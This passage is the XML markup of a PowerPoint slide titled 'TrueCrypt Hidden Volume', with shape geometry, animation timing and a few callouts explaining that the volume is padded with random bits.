                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="21" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="13317"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_x</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="1+#ppt_w/2"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav>
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="22" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="13317"/>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14375" y="214313"/>
            <a:ext cx="7672388" cy="1000125"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:round/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="90000" tIns="46800" rIns="90000" bIns="46800" anchor="b"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:buClr>
                <a:srgbClr val="0070C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err="1" smtClean="0"/>
              <a:t>TrueCrypt</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="4000" smtClean="0"/>
              <a:t> Hidden Volume</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" sz="4000" b="1">
              <a:solidFill>
                <a:srgbClr val="0070C0"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="13315" name="Picture 3"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3" cstate="print"/>
          <a:srcRect/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="0" y="1371600"/>
            <a:ext cx="7401636" cy="5486400"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:round/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="13316" name="AutoShape 4"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="3429000" y="1905000"/>
            <a:ext cx="3886200" cy="1371600"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="T0" fmla="*/ 1357322 w 2714644"/>
              <a:gd name="T1" fmla="*/ 0 h 1000132"/>
              <a:gd name="T2" fmla="*/ 0 w 2714644"/>
              <a:gd name="T3" fmla="*/ 500066 h 1000132"/>
              <a:gd name="T4" fmla="*/ 1357322 w 2714644"/>
              <a:gd name="T5" fmla="*/ 1000132 h 1000132"/>
              <a:gd name="T6" fmla="*/ 2714644 w 2714644"/>
              <a:gd name="T7" fmla="*/ 500066 h 1000132"/>
              <a:gd name="T8" fmla="*/ 125017 w 2714644"/>
              <a:gd name="T9" fmla="*/ 125017 h 1000132"/>
              <a:gd name="T10" fmla="*/ 2589628 w 2714644"/>
              <a:gd name="T11" fmla="*/ 875116 h 1000132"/>
            </a:gdLst>
            <a:ahLst/>
            <a:cxnLst>
              <a:cxn ang="0">
                <a:pos x="T0" y="T1"/>
              </a:cxn>
              <a:cxn ang="0">
                <a:pos x="T2" y="T3"/>
              </a:cxn>
              <a:cxn ang="0">
                <a:pos x="T4" y="T5"/>
              </a:cxn>
              <a:cxn ang="0">
                <a:pos x="T6" y="T7"/>
              </a:cxn>
            </a:cxnLst>
            <a:rect l="T8" t="T9" r="T10" b="T11"/>
            <a:pathLst>
              <a:path w="2714644" h="1000132">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="2714644" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2714644" y="1000132"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="1000132"/>
                </a:lnTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="125017" y="125017"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="125017" y="875116"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2589628" y="875116"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2589628" y="125017"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:solidFill>
            <a:srgbClr val="FF0000"/>
          </a:solidFill>
          <a:ln w="25560">
            <a:solidFill>
              <a:srgbClr val="A2A2A2"/>
            </a:solidFill>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="it-IT"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="13317" name="Text Box 5"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="7467600" y="1295400"/>
            <a:ext cx="1857375" cy="64851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Padded with random bits</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="13318" name="AutoShape 6"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm rot="9240000">
            <a:off x="7178112" y="1998296"/>
            <a:ext cx="1285875"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7" name="AutoShape 4"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm rot="9240000">
            <a:off x="7330511" y="4893895"/>
            <a:ext cx="1285875"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8" name="AutoShape 8"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="3581400" y="4876800"/>
            <a:ext cx="3810000" cy="1371600"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="T0" fmla="*/ 1250165 w 2500330"/>
              <a:gd name="T1" fmla="*/ 0 h 1000132"/>
              <a:gd name="T2" fmla="*/ 0 w 2500330"/>
              <a:gd name="T3" fmla="*/ 500066 h 1000132"/>
              <a:gd name="T4" fmla="*/ 1250165 w 2500330"/>
              <a:gd name="T5" fmla="*/ 1000132 h 1000132"/>
              <a:gd name="T6" fmla="*/ 2500330 w 2500330"/>
              <a:gd name="T7" fmla="*/ 500066 h 1000132"/>
              <a:gd name="T8" fmla="*/ 125017 w 2500330"/>
              <a:gd name="T9" fmla="*/ 125017 h 1000132"/>
              <a:gd name="T10" fmla="*/ 2375314 w 2500330"/>
              <a:gd name="T11" fmla="*/ 875116 h 1000132"/>
            </a:gdLst>
            <a:ahLst/>
            <a:cxnLst>
              <a:cxn ang="0">
                <a:pos x="T0" y="T1"/>
              </a:cxn>
              <a:cxn ang="0">
                <a:pos x="T2" y="T3"/>
              </a:cxn>
              <a:cxn ang="0">
                <a:pos x="T4" y="T5"/>
              </a:cxn>
              <a:cxn ang="0">
                <a:pos x="T6" y="T7"/>
              </a:cxn>
            </a:cxnLst>
            <a:rect l="T8" t="T9" r="T10" b="T11"/>
            <a:pathLst>
              <a:path w="2500330" h="1000132">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="2500330" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2500330" y="1000132"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="1000132"/>
                </a:lnTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="125017" y="125017"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="125017" y="875116"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2375314" y="875116"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2375314" y="125017"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:solidFill>
            <a:srgbClr val="FF0000"/>
          </a:solidFill>
          <a:ln w="25560">
            <a:solidFill>
              <a:srgbClr val="A2A2A2"/>
            </a:solidFill>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="it-IT"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="Text Box 9"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="7467601" y="3429000"/>
            <a:ext cx="1676400" cy="1479509"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:round/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="squar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Inside the standard </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>TrueCrypt</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> volume are still random bits </a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10" name="Slide Number Placeholder 9"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{94759074-FD2C-4344-8997-BA6EDF992768}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>86</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="791302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3315"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect transition="in" filter="box(in)">
                                      <p:cBhvr additive="repl">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childTnLst>
                                    <p:set>
                                      <p:cBhvr additive="repl">
                                        <p:cTn id="11" dur="1" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="0"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="13316"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect transition="in" filter="dissolve">
                                      <p:cBhvr additive="repl">
                                        <p:cTn id="12" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="13316"/>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additive="repl">
                                        <p:cTn id="15" dur="1" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="0"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="13318"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="16" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="13318"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_x</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="1+#ppt_w/2"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav>
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="17" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="13318"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_y</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_y"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav>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additive="repl">
                                        <p:cTn id="20" dur="1" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="0"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="13317"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="21" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="13317"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_x</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="1+#ppt_w/2"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav>
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="22" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="13317"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_y</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_y"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav>
                                          <p:val>
                                            <p:strVal val="#ppt_y"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                            </p:childTnLst>
                          </p:cTn>
                        </p:par>
                        <p:par>
                          <p:cTn id="23" fill="hold">
                            <p:stCondLst>
                              <p:cond delay="1500"/>
                            </p:stCondLst>
                            <p:childTnLst>
                              <p:par>
                                <p:cTn id="24" presetID="9" presetClass="entr" fill="hold" grpId="0" nodeType="afterEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr additive="repl">
                                        <p:cTn id="25" dur="1" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="0"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="8"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect transition="in" filter="dissolve">
                                      <p:cBhvr additive="repl">
                                        <p:cTn id="26" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="8"/>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additive="repl">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100000">
                                          <p:val>
                                            <p:strVal val="1+#ppt_w/2"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav>
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="31" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="7"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_y</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_y"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav>
                                          <p:val>
                                            <p:strVal val="#ppt_y"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                            </p:childTnLst>
                          </p:cTn>
                        </p:par>
                        <p:par>
                          <p:cTn id="32" fill="hold">
                            <p:stCondLst>
                              <p:cond delay="2500"/>
                            </p:stCondLst>
                            <p:childTnLst>
                              <p:par>
                                <p:cTn id="33" presetID="2" presetClass="entr" presetSubtype="2" fill="hold" nodeType="afterEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr additive="repl">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100000">
                                          <p:val>
                                            <p:strVal val="1+#ppt_w/2"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav>
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="36" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="9"/>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P spid="7" grpId="0" animBg="1"/>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714375" y="214313"/>
            <a:ext cx="7672388" cy="1000125"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:round/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="90000" tIns="46800" rIns="90000" bIns="46800" anchor="b"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:buClr>
                <a:srgbClr val="0070C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err="1" smtClean="0"/>
              <a:t>TrueCrypt</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="4000" smtClean="0"/>
              <a:t> Hidden Volume</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" sz="4000" b="1">
              <a:solidFill>
                <a:srgbClr val="0070C0"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="13315" name="Picture 3"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3" cstate="print"/>
          <a:srcRect/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="0" y="1371600"/>
            <a:ext cx="7401636" cy="5486400"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:round/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="13316" name="AutoShape 4"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="3429000" y="1905000"/>
            <a:ext cx="3886200" cy="1371600"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="T0" fmla="*/ 1357322 w 2714644"/>
              <a:gd name="T1" fmla="*/ 0 h 1000132"/>
              <a:gd name="T2" fmla="*/ 0 w 2714644"/>
              <a:gd name="T3" fmla="*/ 500066 h 1000132"/>
              <a:gd name="T4" fmla="*/ 1357322 w 2714644"/>
              <a:gd name="T5" fmla="*/ 1000132 h 1000132"/>
              <a:gd name="T6" fmla="*/ 2714644 w 2714644"/>
              <a:gd name="T7" fmla="*/ 500066 h 1000132"/>
              <a:gd name="T8" fmla="*/ 125017 w 2714644"/>
              <a:gd name="T9" fmla="*/ 125017 h 1000132"/>
              <a:gd name="T10" fmla="*/ 2589628 w 2714644"/>
              <a:gd name="T11" fmla="*/ 875116 h 1000132"/>
            </a:gdLst>
            <a:ahLst/>
            <a:cxnLst>
              <a:cxn ang="0">
                <a:pos x="T0" y="T1"/>
              </a:cxn>
              <a:cxn ang="0">
                <a:pos x="T2" y="T3"/>
              </a:cxn>
              <a:cxn ang="0">
                <a:pos x="T4" y="T5"/>
              </a:cxn>
              <a:cxn ang="0">
                <a:pos x="T6" y="T7"/>
              </a:cxn>
            </a:cxnLst>
            <a:rect l="T8" t="T9" r="T10" b="T11"/>
            <a:pathLst>
              <a:path w="2714644" h="1000132">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="2714644" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2714644" y="1000132"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="1000132"/>
                </a:lnTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="125017" y="125017"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="125017" y="875116"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2589628" y="875116"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2589628" y="125017"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:solidFill>
            <a:srgbClr val="FF0000"/>
          </a:solidFill>
          <a:ln w="25560">
            <a:solidFill>
              <a:srgbClr val="A2A2A2"/>
            </a:solidFill>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="it-IT"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="13317" name="Text Box 5"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="7467600" y="1295400"/>
            <a:ext cx="1857375" cy="64851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Padded with random bits</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="13318" name="AutoShape 6"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm rot="9240000">
            <a:off x="7178112" y="1998296"/>
            <a:ext cx="1285875"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7" name="AutoShape 4"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm rot="9240000">
            <a:off x="7330511" y="4893895"/>
            <a:ext cx="1285875"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8" name="AutoShape 8"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="3581400" y="4876800"/>
            <a:ext cx="3810000" cy="1371600"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="T0" fmla="*/ 1250165 w 2500330"/>
              <a:gd name="T1" fmla="*/ 0 h 1000132"/>
              <a:gd name="T2" fmla="*/ 0 w 2500330"/>
              <a:gd name="T3" fmla="*/ 500066 h 1000132"/>
              <a:gd name="T4" fmla="*/ 1250165 w 2500330"/>
              <a:gd name="T5" fmla="*/ 1000132 h 1000132"/>
              <a:gd name="T6" fmla="*/ 2500330 w 2500330"/>
              <a:gd name="T7" fmla="*/ 500066 h 1000132"/>
              <a:gd name="T8" fmla="*/ 125017 w 2500330"/>
              <a:gd name="T9" fmla="*/ 125017 h 1000132"/>
              <a:gd name="T10" fmla="*/ 2375314 w 2500330"/>
              <a:gd name="T11" fmla="*/ 875116 h 1000132"/>
            </a:gdLst>
            <a:ahLst/>
            <a:cxnLst>
              <a:cxn ang="0">
                <a:pos x="T0" y="T1"/>
              </a:cxn>
              <a:cxn ang="0">
                <a:pos x="T2" y="T3"/>
              </a:cxn>
              <a:cxn ang="0">
                <a:pos x="T4" y="T5"/>
              </a:cxn>
              <a:cxn ang="0">
                <a:pos x="T6" y="T7"/>
              </a:cxn>
            </a:cxnLst>
            <a:rect l="T8" t="T9" r="T10" b="T11"/>
            <a:pathLst>
              <a:path w="2500330" h="1000132">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="2500330" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2500330" y="1000132"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="1000132"/>
                </a:lnTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="125017" y="125017"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="125017" y="875116"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2375314" y="875116"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2375314" y="125017"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:solidFill>
            <a:srgbClr val="FF0000"/>
          </a:solidFill>
          <a:ln w="25560">
            <a:solidFill>
              <a:srgbClr val="A2A2A2"/>
            </a:solidFill>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="it-IT"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="Text Box 9"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="7467601" y="3429000"/>
            <a:ext cx="1676400" cy="1479509"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:round/>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Inside the standard </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>TrueCrypt</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> volume are still random bits  </a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10" name="AutoShape 6"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm rot="10800000">
            <a:off x="408849" y="5257800"/>
